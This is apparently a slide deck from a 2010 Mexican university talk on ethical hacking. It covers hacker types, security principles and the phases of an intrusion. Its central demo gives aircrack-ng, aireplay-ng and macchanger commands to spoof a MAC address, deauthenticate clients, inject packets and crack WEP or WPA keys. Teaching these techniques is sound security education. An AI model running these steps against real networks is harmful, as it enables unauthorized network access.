Universidad Tecnológicadel Sur de Sonora

eXpLoDNoviembre 2010

Seguridad Informática y Ethical Hacking

DisclaimerTodos los contenidos, actividades y aplicaciones(software) mostrados en esta conferencia son con fines100% educativos, por lo cual los expositores einstitución educativa que los imparten se deslindan decualquier responsabilidad que los participantes pudieranadquirir por el mal uso de estos.

Hacking ÉticoEl nombre hacker – neologismo utilizado para referirsea un experto (Gurú) en varias o alguna rama técnicarelacionada con las tecnologías de la información y lastelecomunicaciones: programación, redes, sistemasoperativos.

Cracker – (criminal hacker, 1985). Un cracker esalguienque viola la seguridad de un sistema informático deforma similar a como lo haría un hacker, sólo que adiferencia de este último, el cracker realiza la intrusióncon fines de beneficio personal o para hacer daño a suobjetivo.

Hacking ÉticoHacker ético – profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales).

Ethical Hacking es una disciplina de la seguridadinformática que se sustenta en que la mejor forma deevaluar las amenazas que representan los llamados“hackers” o piratas de la información es conocer cómoactúan y operan.

Elementos esenciales de la seguridad.

Confidencialidad – tiene que ver con la ocultación deinformación o recursos.

Autenticidad - es la identificación y garantía del origende la información.

Integridad - Se refiere a cambios no autorizados en losdatos.

Disponibilidad – Posibilidad de hacer uso de lainformación y recursos deseados.

Hacking Ético

1- Reconocimiento• Pasivo

2- Rastreo (escaneo)• Activo

3- Acceso• Sistema operativo/aplicación• Redes• Denegación de servicio

4- Mantener el acceso5- Borrado de huellas

Tipos de Hacker

- Black hats• Individuals with extraordinary computing skills,resorting to malicious or destructive activities. Alsoknown as „Crackers.‟

- White Hats• Individuals professing hacker skills and using them fordefensive purposes. Also known as „Security Analysts‟.

- Gray Hats• Individuals who work both offensively and defensivelyat various times.

Perfil de habilidades de un hacker ético

Experto en algún campo de la informática.

Conocimientos profundos de diversas plataformas (Windows, Unix, Linux).

Conocimientos de redes.

Conocimientos de hardware y software.

DEMO “Cracking Wireless Passwords“

sudo apt-get install aircrack-ng

sudo apt-get install macchanger

sudo airmon-ng start wlan0

sudo ifconfig mon0 down

sudo macchanger -m 00:11:22:33:44:55 mon0

sudo ifconfig mon0 up

sudo airodump-ng mon0

DEMO “Cracking Wireless Passwords“

control + c

sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

PARA WEP

sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

PARA WEP

sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

DEMO “Cracking Wireless Passwords“

PARA WEP

sudo aircrack-ng -z [nombre red]*.cap

Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de losmismos, hasta que se nos muestre la clave de la red.

Fase #1: Reconocimiento

The Dude

Fase #2: Rastreo (Escaneo)

Nmap y SuperScan

Fase #3: Acceso

Exploits y Spoofing

Fase #4: Mantener el Acceso

Remote Copy Paste Attack

DEMO

Fase #5: Borrado de Huellas(A veces no necesario)

Conclusiones

La seguridad computacional como un todo.

El elemento humano dentro de la seguridad computacional.

El establecimiento de reglas para un mejor nivel de seguridad.

Necesidad de profesionistas calificados para estos trabajos.

Gran amplitud de herramientas OpenSource.

Compromiso social y ético para sistemas.

Innovación diaria.

Preguntas y Respuestas

Contacto

Gracias ¡¡